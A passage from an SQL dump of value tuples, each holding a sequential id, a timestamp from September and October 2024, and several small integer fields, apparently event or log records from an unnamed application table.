(13734, '2024-09-13 19:58:43', 1, 2054, 0, 1, 1),
(13735, '2024-09-13 20:23:50', 1, 2058, 0, 1, 1),
(13736, '2024-09-13 22:17:26', 1, 2055, 0, 1, 1),
(13737, '2024-09-13 23:19:42', 1, 2054, 0, 1, 1),
(13738, '2024-09-13 23:21:45', 1, 2060, 0, 1, 1),
(13739, '2024-09-14 01:05:18', 1, 2061, 0, 1, 1),
(13740, '2024-09-14 02:18:16', 1, 2062, 0, 1, 1),
(13741, '2024-09-14 04:37:32', 1, 2054, 0, 1, 1),
(13742, '2024-09-14 05:06:54', 1, 2059, 0, 1, 1),
(13743, '2024-09-14 05:30:04', 1, 2064, 0, 1, 1),
(13744, '2024-09-14 06:28:09', 1, 2063, 0, 1, 1),
(13745, '2024-09-14 07:41:55', 1, 2054, 0, 1, 1),
(13746, '2024-09-14 13:23:50', 1, 2063, 0, 1, 1),
(13747, '2024-09-14 22:59:47', 1, 2054, 0, 1, 1),
(13748, '2024-09-14 23:16:45', 1, 2058, 0, 1, 1),
(13749, '2024-09-15 06:44:48', 1, 2058, 0, 1, 1),
(13750, '2024-09-15 09:49:50', 1, 2064, 0, 1, 1),
(13751, '2024-09-15 10:08:04', 1, 2058, 0, 1, 1),
(13752, '2024-09-15 12:01:40', 1, 2061, 0, 1, 1),
(13753, '2024-09-15 12:05:03', 1, 2060, 0, 1, 1),
(13754, '2024-09-15 12:21:33', 1, 2061, 0, 1, 1),
(13755, '2024-09-15 12:27:58', 1, 2054, 0, 1, 1),
(13756, '2024-09-15 15:39:33', 1, 2058, 0, 1, 1),
(13757, '2024-09-16 01:20:59', 1, 2054, 0, 1, 1),
(13758, '2024-09-16 02:39:32', 1, 2054, 0, 1, 1),
(13759, '2024-09-16 02:59:30', 1, 2062, 0, 1, 1),
(13760, '2024-09-16 07:58:30', 1, 2059, 0, 1, 1),
(13761, '2024-09-16 07:58:35', 1, 2060, 0, 1, 1),
(13762, '2024-09-16 08:00:37', 1, 2063, 0, 1, 1),
(13763, '2024-09-16 08:00:38', 1, 2058, 0, 1, 1),
(13764, '2024-09-16 08:00:39', 1, 2064, 0, 1, 1),
(13765, '2024-09-16 08:01:43', 1, 2062, 0, 1, 1),
(13766, '2024-09-16 08:01:45', 1, 2061, 0, 1, 1),
(13767, '2024-09-16 10:33:03', 1, 2058, 0, 1, 1),
(13768, '2024-09-16 11:36:09', 1, 2061, 0, 1, 1),
(13769, '2024-09-16 12:12:07', 1, 2054, 0, 1, 1),
(13770, '2024-09-16 13:30:45', 1, 2054, 0, 1, 1),
(13771, '2024-09-16 13:51:03', 1, 2054, 0, 1, 1),
(13772, '2024-09-16 15:02:26', 1, 2055, 0, 1, 1),
(13773, '2024-09-16 16:56:52', 1, 2063, 0, 1, 1),
(13774, '2024-09-16 21:56:11', 1, 2059, 0, 1, 1),
(13775, '2024-09-16 22:40:51', 1, 2064, 0, 1, 1),
(13776, '2024-09-16 23:10:15', 1, 2054, 0, 1, 1),
(13777, '2024-09-16 23:21:17', 1, 2059, 0, 1, 1),
(13778, '2024-09-17 01:58:25', 1, 2054, 0, 1, 1),
(13779, '2024-09-17 02:41:20', 1, 2062, 0, 1, 1),
(13780, '2024-09-17 03:03:10', 1, 2059, 0, 1, 1),
(13781, '2024-09-17 07:21:13', 1, 2053, 0, 1, 1),
(13782, '2024-09-17 08:48:23', 1, 2061, 0, 1, 1),
(13783, '2024-09-17 10:01:27', 1, 2058, 0, 1, 1),
(13784, '2024-09-17 11:32:39', 1, 2054, 0, 1, 1),
(13785, '2024-09-17 12:19:07', 1, 2064, 2576, 1, 1),
(13786, '2024-09-17 12:19:26', 1, 2064, 2576, 1, 1),
(13787, '2024-09-17 12:19:30', 1, 2064, 2576, 1, 1),
(13788, '2024-09-17 13:22:15', 1, 2062, 0, 1, 1),
(13789, '2024-09-17 14:30:09', 1, 2054, 0, 1, 1),
(13790, '2024-09-17 19:57:20', 1, 2061, 0, 1, 1),
(13791, '2024-09-17 20:45:41', 1, 2059, 0, 1, 1),
(13792, '2024-09-17 21:47:29', 1, 2064, 0, 1, 1),
(13793, '2024-09-17 23:44:29', 1, 2054, 0, 1, 1),
(13794, '2024-09-18 03:52:06', 1, 2054, 0, 1, 1),
(13795, '2024-09-18 07:00:25', 1, 2061, 0, 1, 1),
(13796, '2024-09-18 09:33:17', 1, 2064, 0, 1, 1),
(13797, '2024-09-18 10:56:34', 1, 2059, 0, 1, 1),
(13798, '2024-09-18 10:57:24', 1, 2063, 0, 1, 1),
(13799, '2024-09-18 10:58:21', 1, 2063, 0, 1, 1),
(13800, '2024-09-18 11:22:52', 1, 2064, 0, 1, 1),
(13801, '2024-09-18 16:03:19', 1, 2058, 0, 1, 1),
(13802, '2024-09-18 17:14:14', 1, 2060, 0, 1, 1),
(13803, '2024-09-18 17:14:28', 1, 2064, 0, 1, 1),
(13804, '2024-09-18 21:11:17', 1, 2061, 0, 1, 1),
(13805, '2024-09-19 02:46:57', 1, 2054, 0, 1, 1),
(13806, '2024-09-19 06:39:12', 1, 2053, 0, 1, 1),
(13807, '2024-09-19 09:11:36', 1, 2055, 0, 1, 1),
(13808, '2024-09-19 09:45:42', 1, 2064, 0, 1, 1),
(13809, '2024-09-19 09:45:46', 1, 2064, 0, 1, 1),
(13810, '2024-09-19 09:47:42', 1, 2064, 0, 1, 1),
(13811, '2024-09-19 10:58:02', 1, 2062, 0, 1, 1),
(13812, '2024-09-19 12:39:59', 1, 2053, 0, 1, 1),
(13813, '2024-09-19 12:44:04', 1, 2054, 0, 1, 1),
(13814, '2024-09-19 16:47:12', 1, 2061, 0, 1, 1),
(13815, '2024-09-19 17:21:25', 1, 2063, 0, 1, 1),
(13816, '2024-09-19 17:56:15', 1, 2058, 0, 1, 1),
(13817, '2024-09-19 18:37:40', 1, 2063, 0, 1, 1),
(13818, '2024-09-19 21:21:31', 1, 2058, 0, 1, 1),
(13819, '2024-09-20 04:42:26', 1, 2054, 0, 1, 1),
(13820, '2024-09-20 05:54:42', 1, 2059, 0, 1, 1),
(13821, '2024-09-20 06:14:15', 1, 2063, 0, 1, 1),
(13822, '2024-09-20 06:14:21', 1, 2064, 0, 1, 1),
(13823, '2024-09-20 08:14:24', 1, 2064, 0, 1, 1),
(13824, '2024-09-20 11:34:13', 1, 2062, 0, 1, 1),
(13825, '2024-09-20 11:54:42', 1, 2054, 0, 1, 1),
(13826, '2024-09-20 11:58:57', 1, 2059, 0, 1, 1),
(13827, '2024-09-20 20:05:15', 1, 2063, 0, 1, 1),
(13828, '2024-09-20 20:09:29', 1, 2061, 0, 1, 1),
(13829, '2024-09-20 21:52:51', 1, 2054, 0, 1, 1),
(13830, '2024-09-20 22:59:56', 1, 2053, 0, 1, 1),
(13831, '2024-09-21 02:23:41', 1, 2054, 0, 1, 1),
(13832, '2024-09-21 04:42:23', 1, 2062, 0, 1, 1),
(13833, '2024-09-21 07:06:51', 1, 2055, 0, 1, 1),
(13834, '2024-09-21 07:28:18', 1, 2054, 0, 1, 1),
(13835, '2024-09-21 09:52:15', 1, 2061, 0, 1, 1),
(13836, '2024-09-21 11:26:59', 1, 2060, 0, 1, 1),
(13837, '2024-09-21 12:59:30', 1, 2058, 0, 1, 1),
(13838, '2024-09-21 13:48:47', 1, 2054, 0, 1, 1),
(13839, '2024-09-21 13:52:50', 1, 2054, 0, 1, 1),
(13840, '2024-09-21 15:14:48', 1, 2058, 0, 1, 1),
(13841, '2024-09-21 16:32:44', 1, 2064, 0, 1, 1),
(13842, '2024-09-21 17:13:51', 1, 2064, 0, 1, 1),
(13843, '2024-09-22 02:21:34', 1, 2054, 0, 1, 1),
(13844, '2024-09-22 03:06:58', 1, 2064, 0, 1, 1),
(13845, '2024-09-22 05:03:35', 1, 2064, 0, 1, 1),
(13846, '2024-09-22 11:02:47', 1, 2054, 0, 1, 1),
(13847, '2024-09-22 11:32:30', 1, 2062, 0, 1, 1),
(13848, '2024-09-22 12:43:33', 1, 2060, 0, 1, 1),
(13849, '2024-09-22 12:55:38', 1, 2054, 0, 1, 1),
(13850, '2024-09-22 15:37:15', 1, 2059, 0, 1, 1),
(13851, '2024-09-22 17:28:47', 1, 2064, 2595, 1, 1),
(13852, '2024-09-22 17:29:06', 1, 2064, 2595, 1, 1),
(13853, '2024-09-22 17:29:10', 1, 2064, 2595, 1, 1),
(13854, '2024-09-22 19:32:11', 1, 2064, 0, 1, 1),
(13855, '2024-09-22 20:36:06', 1, 2060, 0, 1, 1),
(13856, '2024-09-23 00:50:38', 1, 2064, 0, 1, 1),
(13857, '2024-09-23 02:56:08', 1, 2061, 0, 1, 1),
(13858, '2024-09-23 04:35:01', 1, 2054, 0, 1, 1),
(13859, '2024-09-23 06:33:18', 1, 2062, 0, 1, 1),
(13860, '2024-09-23 06:57:41', 1, 2064, 0, 1, 1),
(13861, '2024-09-23 07:44:00', 1, 2060, 0, 1, 1),
(13862, '2024-09-23 07:55:31', 1, 2063, 0, 1, 1),
(13863, '2024-09-23 08:25:54', 1, 2058, 0, 1, 1),
(13864, '2024-09-23 08:43:49', 1, 2054, 0, 1, 1),
(13865, '2024-09-23 09:18:16', 1, 2055, 0, 1, 1),
(13866, '2024-09-23 09:19:08', 1, 2062, 0, 1, 1),
(13867, '2024-09-23 10:05:24', 1, 2064, 0, 1, 1),
(13868, '2024-09-23 10:39:50', 1, 2061, 0, 1, 1),
(13869, '2024-09-23 11:09:49', 1, 2063, 0, 1, 1),
(13870, '2024-09-23 11:39:40', 1, 2060, 0, 1, 1),
(13871, '2024-09-23 11:51:28', 1, 2063, 0, 1, 1),
(13872, '2024-09-23 12:02:53', 1, 2058, 0, 1, 1),
(13873, '2024-09-23 12:21:34', 1, 2058, 0, 1, 1),
(13874, '2024-09-23 13:01:17', 1, 2061, 0, 1, 1),
(13875, '2024-09-23 13:13:46', 1, 2055, 0, 1, 1),
(13876, '2024-09-23 13:32:32', 1, 2062, 0, 1, 1),
(13877, '2024-09-23 14:34:58', 1, 2061, 0, 1, 1),
(13878, '2024-09-23 15:00:57', 1, 2064, 0, 1, 1),
(13879, '2024-09-23 15:01:24', 1, 2064, 0, 1, 1),
(13880, '2024-09-23 15:29:05', 1, 2060, 0, 1, 1),
(13881, '2024-09-23 15:46:11', 1, 2063, 0, 1, 1),
(13882, '2024-09-23 16:29:22', 1, 2058, 0, 1, 1),
(13883, '2024-09-23 16:47:25', 1, 2054, 0, 1, 1),
(13884, '2024-09-23 17:45:02', 1, 2055, 0, 1, 1),
(13885, '2024-09-23 19:44:08', 1, 2061, 0, 1, 1),
(13886, '2024-09-23 20:33:50', 1, 2060, 0, 1, 1),
(13887, '2024-09-23 20:45:38', 1, 2063, 0, 1, 1),
(13888, '2024-09-23 21:49:42', 1, 2060, 0, 1, 1),
(13889, '2024-09-23 22:00:59', 1, 2063, 0, 1, 1),
(13890, '2024-09-23 22:30:55', 1, 2058, 0, 1, 1),
(13891, '2024-09-23 23:23:35', 1, 2055, 0, 1, 1),
(13892, '2024-09-23 23:43:12', 1, 2058, 0, 1, 1),
(13893, '2024-09-24 00:27:27', 1, 2060, 0, 1, 1),
(13894, '2024-09-24 00:38:57', 1, 2063, 0, 1, 1),
(13895, '2024-09-24 01:06:28', 1, 2058, 0, 1, 1),
(13896, '2024-09-24 01:32:29', 1, 2062, 0, 1, 1),
(13897, '2024-09-24 01:56:25', 1, 2055, 0, 1, 1),
(13898, '2024-09-24 02:03:29', 1, 2054, 0, 1, 1),
(13899, '2024-09-24 03:03:31', 1, 2060, 0, 1, 1),
(13900, '2024-09-24 03:08:31', 1, 2059, 0, 1, 1),
(13901, '2024-09-24 03:09:44', 1, 2062, 0, 1, 1),
(13902, '2024-09-24 03:21:38', 1, 2063, 0, 1, 1),
(13903, '2024-09-24 04:06:23', 1, 2058, 0, 1, 1),
(13904, '2024-09-24 04:27:34', 1, 2054, 0, 1, 1),
(13905, '2024-09-24 05:25:27', 1, 2055, 0, 1, 1),
(13906, '2024-09-24 07:28:42', 1, 2061, 0, 1, 1),
(13907, '2024-09-24 08:22:32', 1, 2062, 0, 1, 1),
(13908, '2024-09-24 10:06:34', 1, 2054, 0, 1, 1),
(13909, '2024-09-24 10:29:16', 1, 2059, 0, 1, 1),
(13910, '2024-09-24 10:30:53', 1, 2061, 0, 1, 1),
(13911, '2024-09-24 10:31:03', 1, 2061, 0, 1, 1),
(13912, '2024-09-24 10:43:08', 1, 2059, 0, 1, 1),
(13913, '2024-09-24 10:48:10', 1, 2064, 0, 1, 1),
(13914, '2024-09-24 12:32:58', 1, 2061, 0, 1, 1),
(13915, '2024-09-24 16:53:57', 1, 2054, 0, 1, 1),
(13916, '2024-09-25 00:10:50', 1, 2059, 0, 1, 1),
(13917, '2024-09-25 00:57:18', 1, 2055, 0, 1, 1),
(13918, '2024-09-25 07:05:38', 1, 2054, 0, 1, 1),
(13919, '2024-09-25 08:43:26', 1, 2053, 0, 1, 1),
(13920, '2024-09-25 11:11:01', 1, 2062, 0, 1, 1),
(13921, '2024-09-25 11:30:22', 1, 2063, 0, 1, 1),
(13922, '2024-09-25 11:33:23', 1, 2059, 0, 1, 1),
(13923, '2024-09-25 12:27:01', 1, 2064, 0, 1, 1),
(13924, '2024-09-25 18:52:41', 1, 2054, 0, 1, 1),
(13925, '2024-09-25 21:25:53', 1, 2061, 0, 1, 1),
(13926, '2024-09-25 23:45:46', 1, 2054, 0, 1, 1),
(13927, '2024-09-26 01:34:17', 1, 2062, 0, 1, 1),
(13928, '2024-09-26 02:20:49', 1, 2064, 0, 1, 1),
(13929, '2024-09-26 02:51:45', 1, 2063, 0, 1, 1),
(13930, '2024-09-26 08:55:58', 1, 2064, 0, 1, 1),
(13931, '2024-09-26 08:56:28', 1, 2053, 0, 1, 1),
(13932, '2024-09-26 09:05:19', 1, 2058, 0, 1, 1),
(13933, '2024-09-26 13:55:21', 1, 2054, 0, 1, 1),
(13934, '2024-09-26 21:31:51', 1, 2055, 0, 1, 1),
(13935, '2024-09-27 03:27:26', 1, 2054, 0, 1, 1),
(13936, '2024-09-27 06:37:19', 1, 2060, 0, 1, 1),
(13937, '2024-09-27 11:47:07', 1, 2060, 0, 1, 1),
(13938, '2024-09-27 12:30:12', 1, 2054, 0, 1, 1),
(13939, '2024-09-27 13:40:17', 1, 2054, 0, 1, 1),
(13940, '2024-09-27 15:13:22', 1, 2063, 0, 1, 1),
(13941, '2024-09-27 15:13:31', 1, 2063, 0, 1, 1),
(13942, '2024-09-27 23:16:26', 1, 2061, 0, 1, 1),
(13943, '2024-09-27 23:51:37', 1, 2054, 0, 1, 1),
(13944, '2024-09-28 06:16:01', 1, 2054, 0, 1, 1),
(13945, '2024-09-28 07:28:37', 1, 2055, 0, 1, 1),
(13946, '2024-09-28 10:08:41', 1, 2062, 0, 1, 1),
(13947, '2024-09-28 11:20:38', 1, 2058, 0, 1, 1),
(13948, '2024-09-28 16:09:36', 1, 2059, 0, 1, 1),
(13949, '2024-09-28 16:48:55', 1, 2063, 0, 1, 1),
(13950, '2024-09-28 19:07:33', 1, 2064, 0, 1, 1),
(13951, '2024-09-28 19:22:01', 1, 2064, 2624, 1, 1),
(13952, '2024-09-28 19:22:17', 1, 2064, 2624, 1, 1),
(13953, '2024-09-28 19:22:20', 1, 2064, 2624, 1, 1),
(13954, '2024-09-28 20:05:59', 1, 2063, 0, 1, 1),
(13955, '2024-09-28 21:36:58', 1, 2062, 0, 1, 1),
(13956, '2024-09-29 01:50:20', 1, 2055, 0, 1, 1),
(13957, '2024-09-29 04:49:16', 1, 2054, 0, 1, 1),
(13958, '2024-09-29 05:14:30', 1, 2063, 0, 1, 1),
(13959, '2024-09-29 05:54:04', 1, 2054, 0, 1, 1),
(13960, '2024-09-29 07:00:10', 1, 2054, 0, 1, 1),
(13961, '2024-09-29 09:04:34', 1, 2060, 0, 1, 1),
(13962, '2024-09-29 14:44:15', 1, 2054, 0, 1, 1),
(13963, '2024-09-29 15:55:00', 1, 2061, 0, 1, 1),
(13964, '2024-09-29 16:16:07', 1, 2063, 0, 1, 1),
(13965, '2024-09-29 18:17:25', 1, 2059, 0, 1, 1),
(13966, '2024-09-30 06:10:06', 1, 2058, 0, 1, 1),
(13967, '2024-09-30 06:46:58', 1, 2063, 0, 1, 1),
(13968, '2024-09-30 06:51:11', 1, 2061, 0, 1, 1),
(13969, '2024-09-30 06:55:01', 1, 2062, 0, 1, 1),
(13970, '2024-09-30 07:04:56', 1, 2060, 0, 1, 1),
(13971, '2024-09-30 07:14:02', 1, 2059, 0, 1, 1),
(13972, '2024-09-30 07:23:28', 1, 2064, 0, 1, 1),
(13973, '2024-09-30 08:24:43', 1, 2054, 0, 1, 1),
(13974, '2024-09-30 09:16:12', 1, 2055, 0, 1, 1),
(13975, '2024-09-30 14:52:48', 1, 2054, 0, 1, 1),
(13976, '2024-09-30 16:04:45', 1, 2054, 0, 1, 1),
(13977, '2024-10-01 01:52:59', 1, 2058, 0, 1, 1),
(13978, '2024-10-01 02:28:01', 1, 2053, 0, 1, 1),
(13979, '2024-10-01 02:47:57', 1, 2054, 0, 1, 1),
(13980, '2024-10-01 02:48:04', 1, 2059, 0, 1, 1),
(13981, '2024-10-01 02:48:12', 1, 2061, 0, 1, 1),
(13982, '2024-10-01 02:48:23', 1, 2058, 0, 1, 1),
(13983, '2024-10-01 04:19:20', 1, 2054, 0, 1, 1),
(13984, '2024-10-01 07:30:31', 1, 2060, 0, 1, 1),
(13985, '2024-10-01 09:49:07', 1, 2064, 2632, 1, 1),
(13986, '2024-10-01 09:49:32', 1, 2064, 2632, 1, 1),
(13987, '2024-10-01 09:49:35', 1, 2064, 2632, 1, 1),
(13988, '2024-10-01 10:44:44', 1, 2062, 0, 1, 1),
(13989, '2024-10-01 16:12:38', 1, 2064, 0, 1, 1),
(13990, '2024-10-01 16:46:54', 1, 2054, 0, 1, 1),
(13991, '2024-10-01 19:57:11', 1, 2064, 0, 1, 1),
(13992, '2024-10-01 23:41:05', 1, 2062, 0, 1, 1),
(13993, '2024-10-01 23:41:06', 1, 2062, 0, 1, 1),
(13994, '2024-10-02 03:14:37', 1, 2054, 0, 1, 1),
(13995, '2024-10-02 03:21:52', 1, 2064, 0, 1, 1),
(13996, '2024-10-02 05:06:24', 1, 2063, 0, 1, 1),
(13997, '2024-10-02 06:47:29', 1, 2060, 0, 1, 1),
(13998, '2024-10-02 17:23:41', 1, 2054, 0, 1, 1),
(13999, '2024-10-02 18:09:05', 1, 2059, 0, 1, 1),
(14000, '2024-10-02 18:09:07', 1, 2059, 0, 1, 1),
(14001, '2024-10-03 01:11:52', 1, 2055, 0, 1, 1),
(14002, '2024-10-03 01:12:03', 1, 2064, 0, 1, 1),
(14003, '2024-10-03 01:12:16', 1, 2061, 0, 1, 1),
(14004, '2024-10-03 01:12:22', 1, 2058, 0, 1, 1),
(14005, '2024-10-03 05:18:54', 1, 2053, 0, 1, 1),
(14006, '2024-10-03 07:23:53', 1, 2054, 0, 1, 1),
(14007, '2024-10-03 08:28:38', 1, 2058, 0, 1, 1),
(14008, '2024-10-03 11:56:39', 1, 2054, 0, 1, 1),
(14009, '2024-10-03 20:30:14', 1, 2054, 0, 1, 1),
(14010, '2024-10-03 20:30:19', 1, 2055, 0, 1, 1),
(14011, '2024-10-03 20:30:22', 1, 2058, 0, 1, 1),
(14012, '2024-10-03 20:30:24', 1, 2059, 0, 1, 1),
(14013, '2024-10-03 20:30:27', 1, 2060, 0, 1, 1),
(14014, '2024-10-03 20:30:30', 1, 2061, 0, 1, 1),
(14015, '2024-10-03 20:30:33', 1, 2062, 0, 1, 1),
(14016, '2024-10-03 20:30:36', 1, 2063, 0, 1, 1),
(14017, '2024-10-03 20:30:41', 1, 2064, 0, 1, 1),
(14018, '2024-10-03 20:30:44', 1, 2064, 0, 1, 1),
(14019, '2024-10-03 20:30:46', 1, 2064, 0, 1, 1),
(14020, '2024-10-03 20:39:28', 1, 2054, 0, 1, 1),
(14021, '2024-10-03 20:55:14', 1, 2060, 0, 1, 1),
(14022, '2024-10-04 09:21:00', 1, 2054, 0, 1, 1),
(14023, '2024-10-04 10:32:34', 1, 2064, 0, 1, 1),
(14024, '2024-10-04 10:35:59', 1, 2055, 0, 1, 1),
(14025, '2024-10-04 10:56:18', 1, 2054, 0, 1, 1),
(14026, '2024-10-04 15:40:35', 1, 2054, 0, 1, 1),
(14027, '2024-10-04 17:40:56', 1, 2061, 0, 1, 1),
(14028, '2024-10-04 19:38:26', 1, 2058, 0, 1, 1),
(14029, '2024-10-04 20:45:28', 1, 2053, 0, 1, 1),
(14030, '2024-10-04 21:23:43', 1, 2059, 0, 1, 1),
(14031, '2024-10-04 22:40:01', 1, 2062, 0, 1, 1),
(14032, '2024-10-04 23:03:51', 1, 2055, 0, 1, 1),
(14033, '2024-10-04 23:06:25', 1, 2064, 0, 1, 1),
(14034, '2024-10-05 01:37:35', 1, 2060, 0, 1, 1),
(14035, '2024-10-05 05:32:26', 1, 2064, 0, 1, 1),
(14036, '2024-10-05 07:23:52', 1, 2063, 0, 1, 1),
(14037, '2024-10-05 09:07:22', 1, 2058, 0, 1, 1),
(14038, '2024-10-05 14:30:48', 1, 2055, 0, 1, 1),
(14039, '2024-10-05 18:00:58', 1, 2060, 0, 1, 1),
(14040, '2024-10-05 18:10:45', 1, 2063, 0, 1, 1),
(14041, '2024-10-05 18:35:27', 1, 2058, 0, 1, 1),
(14042, '2024-10-05 19:20:17', 1, 2055, 0, 1, 1),
(14043, '2024-10-05 19:47:38', 1, 2064, 0, 1, 1),
(14044, '2024-10-05 20:41:43', 1, 2061, 0, 1, 1),
(14045, '2024-10-05 21:17:45', 1, 2062, 0, 1, 1),
(14046, '2024-10-05 22:15:37', 1, 2060, 0, 1, 1),
(14047, '2024-10-05 22:25:02', 1, 2063, 0, 1, 1),
(14048, '2024-10-05 23:06:24', 1, 2060, 0, 1, 1),
(14049, '2024-10-05 23:15:42', 1, 2063, 0, 1, 1),
(14050, '2024-10-05 23:39:58', 1, 2058, 0, 1, 1),
(14051, '2024-10-06 00:33:58', 1, 2053, 0, 1, 1),
(14052, '2024-10-06 00:41:11', 1, 2060, 0, 1, 1),
(14053, '2024-10-06 00:44:34', 1, 2054, 0, 1, 1),
(14054, '2024-10-06 00:49:57', 1, 2063, 0, 1, 1),
(14055, '2024-10-06 01:10:58', 1, 2058, 0, 1, 1),
(14056, '2024-10-06 01:25:37', 1, 2060, 0, 1, 1),
(14057, '2024-10-06 01:34:54', 1, 2063, 0, 1, 1),
(14058, '2024-10-06 01:58:57', 1, 2058, 0, 1, 1),
(14059, '2024-10-06 02:06:14', 1, 2064, 0, 1, 1),
(14060, '2024-10-06 02:42:35', 1, 2055, 0, 1, 1),
(14061, '2024-10-06 04:03:35', 1, 2061, 0, 1, 1),
(14062, '2024-10-06 04:34:49', 1, 2061, 0, 1, 1),
(14063, '2024-10-06 04:39:18', 1, 2062, 0, 1, 1),
(14064, '2024-10-06 05:47:03', 1, 2054, 0, 1, 1),
(14065, '2024-10-06 06:03:37', 1, 2059, 0, 1, 1),
(14066, '2024-10-06 06:17:03', 1, 2064, 0, 1, 1),
(14067, '2024-10-06 09:37:27', 1, 2064, 0, 1, 1),
(14068, '2024-10-06 11:14:30', 1, 2055, 0, 1, 1),
(14069, '2024-10-06 11:50:04', 1, 2054, 0, 1, 1),
(14070, '2024-10-06 12:45:21', 1, 2054, 0, 1, 1),
(14071, '2024-10-06 15:36:03', 1, 2061, 0, 1, 1),
(14072, '2024-10-06 19:00:22', 1, 2064, 0, 1, 1),
(14073, '2024-10-06 23:39:13', 1, 2059, 0, 1, 1),
(14074, '2024-10-07 01:35:30', 1, 2058, 0, 1, 1),
(14075, '2024-10-07 02:25:17', 1, 2054, 0, 1, 1),
(14076, '2024-10-07 05:25:42', 1, 2060, 0, 1, 1),
(14077, '2024-10-07 06:35:41', 1, 2063, 0, 1, 1),
(14078, '2024-10-07 14:50:08', 1, 2054, 0, 1, 1),
(14079, '2024-10-07 18:26:14', 1, 2061, 0, 1, 1),
(14080, '2024-10-07 19:00:33', 1, 2058, 0, 1, 1),
(14081, '2024-10-07 19:16:23', 1, 2058, 0, 1, 1),
(14082, '2024-10-07 19:16:24', 1, 2064, 0, 1, 1),
(14083, '2024-10-07 19:16:24', 1, 2064, 0, 1, 1),
(14084, '2024-10-07 19:16:24', 1, 2064, 0, 1, 1),
(14085, '2024-10-07 19:16:24', 1, 2053, 0, 1, 1),
(14086, '2024-10-07 19:16:25', 1, 2055, 0, 1, 1),
(14087, '2024-10-07 19:16:43', 1, 2061, 0, 1, 1),
(14088, '2024-10-07 19:17:02', 1, 2060, 0, 1, 1),
(14089, '2024-10-07 19:17:03', 1, 2063, 0, 1, 1),
(14090, '2024-10-07 19:17:04', 1, 2059, 0, 1, 1),
(14091, '2024-10-07 19:17:06', 1, 2054, 0, 1, 1),
(14092, '2024-10-07 19:17:07', 1, 2062, 0, 1, 1),
(14093, '2024-10-07 19:17:08', 1, 2053, 0, 1, 1),
(14094, '2024-10-07 20:53:32', 1, 2064, 0, 1, 1),
(14095, '2024-10-07 20:53:33', 1, 2055, 0, 1, 1),
(14096, '2024-10-07 20:53:33', 1, 2058, 0, 1, 1),
(14097, '2024-10-07 20:53:34', 1, 2053, 0, 1, 1),
(14098, '2024-10-07 20:53:36', 1, 2064, 0, 1, 1),
(14099, '2024-10-07 20:53:37', 1, 2064, 0, 1, 1),
(14100, '2024-10-07 20:53:50', 1, 2061, 0, 1, 1),
(14101, '2024-10-07 20:54:10', 1, 2062, 0, 1, 1),
(14102, '2024-10-07 20:54:10', 1, 2059, 0, 1, 1),
(14103, '2024-10-07 20:54:12', 1, 2060, 0, 1, 1),
(14104, '2024-10-07 20:54:13', 1, 2063, 0, 1, 1),
(14105, '2024-10-07 20:54:14', 1, 2054, 0, 1, 1),
(14106, '2024-10-08 03:48:04', 1, 2054, 0, 1, 1),
(14107, '2024-10-08 04:58:16', 1, 2054, 0, 1, 1),
(14108, '2024-10-08 04:58:19', 1, 2055, 0, 1, 1),
(14109, '2024-10-08 04:58:25', 1, 2058, 0, 1, 1),
(14110, '2024-10-08 04:58:33', 1, 2059, 0, 1, 1),
(14111, '2024-10-08 04:58:41', 1, 2060, 0, 1, 1),
(14112, '2024-10-08 04:58:50', 1, 2061, 0, 1, 1),
(14113, '2024-10-08 04:59:01', 1, 2062, 0, 1, 1),
(14114, '2024-10-08 04:59:11', 1, 2063, 0, 1, 1),
(14115, '2024-10-08 04:59:40', 1, 2064, 0, 1, 1),
(14116, '2024-10-08 04:59:53', 1, 2064, 0, 1, 1),
(14117, '2024-10-08 05:00:05', 1, 2064, 0, 1, 1),
(14118, '2024-10-08 09:24:48', 1, 2058, 0, 1, 1),
(14119, '2024-10-08 11:11:02', 1, 2060, 0, 1, 1),
(14120, '2024-10-08 11:29:31', 1, 2064, 0, 1, 1),
(14121, '2024-10-08 14:20:23', 1, 2061, 0, 1, 1),
(14122, '2024-10-08 14:20:26', 1, 2061, 0, 1, 1),
(14123, '2024-10-08 17:56:32', 1, 2054, 0, 1, 1),
(14124, '2024-10-08 18:05:43', 1, 2063, 0, 1, 1),
(14125, '2024-10-09 02:35:08', 1, 2060, 0, 1, 1),
(14126, '2024-10-09 02:35:42', 1, 2064, 0, 1, 1),
(14127, '2024-10-09 06:30:15', 1, 2054, 0, 1, 1),
(14128, '2024-10-09 08:33:07', 4, 2063, 2661, 1, 1),
(14129, '2024-10-09 11:37:26', 1, 2054, 0, 1, 1),
(14130, '2024-10-09 12:13:14', 1, 2062, 0, 1, 1),
(14131, '2024-10-09 17:22:54', 1, 2058, 0, 1, 1),
(14132, '2024-10-09 17:39:24', 1, 2054, 0, 1, 1),
(14133, '2024-10-09 20:04:47', 1, 2064, 0, 1, 1),
(14134, '2024-10-09 21:18:46', 1, 2055, 0, 1, 1),
(14135, '2024-10-09 21:18:47', 1, 2058, 0, 1, 1),
(14136, '2024-10-10 02:15:35', 1, 2058, 0, 1, 1),
(14137, '2024-10-10 10:16:41', 1, 2064, 0, 1, 1),
(14138, '2024-10-10 11:05:50', 1, 2060, 0, 1, 1),
(14139, '2024-10-10 11:37:34', 1, 2059, 0, 1, 1),
(14140, '2024-10-10 15:16:12', 1, 2054, 0, 1, 1),
(14141, '2024-10-10 15:28:02', 1, 2055, 0, 1, 1),
(14142, '2024-10-10 15:59:42', 1, 2053, 0, 1, 1),
(14143, '2024-10-10 15:59:57', 1, 2064, 0, 1, 1),
(14144, '2024-10-10 16:07:28', 1, 2058, 0, 1, 1),
(14145, '2024-10-10 17:49:32', 1, 2061, 0, 1, 1),
(14146, '2024-10-10 17:58:33', 1, 2063, 0, 1, 1),
(14147, '2024-10-10 18:07:09', 1, 2062, 0, 1, 1),
(14148, '2024-10-10 19:08:34', 1, 2058, 0, 1, 1),
(14149, '2024-10-10 19:38:06', 1, 2062, 0, 1, 1),
(14150, '2024-10-10 19:49:10', 1, 2054, 0, 1, 1),
(14151, '2024-10-10 23:45:09', 1, 2064, 0, 1, 1),
(14152, '2024-10-11 01:27:29', 1, 2055, 0, 1, 1),
(14153, '2024-10-11 04:55:03', 1, 2059, 0, 1, 1),
(14154, '2024-10-11 05:09:05', 1, 2059, 0, 1, 1),
(14155, '2024-10-11 09:07:06', 1, 2054, 0, 1, 1),
(14156, '2024-10-11 09:59:07', 1, 2063, 0, 1, 1),
(14157, '2024-10-11 21:22:18', 1, 2064, 0, 1, 1),
(14158, '2024-10-11 21:49:10', 1, 2054, 0, 1, 1),
(14159, '2024-10-12 03:39:57', 1, 2063, 0, 1, 1),
(14160, '2024-10-12 03:40:58', 1, 2055, 0, 1, 1),
(14161, '2024-10-12 04:59:05', 1, 2061, 0, 1, 1),
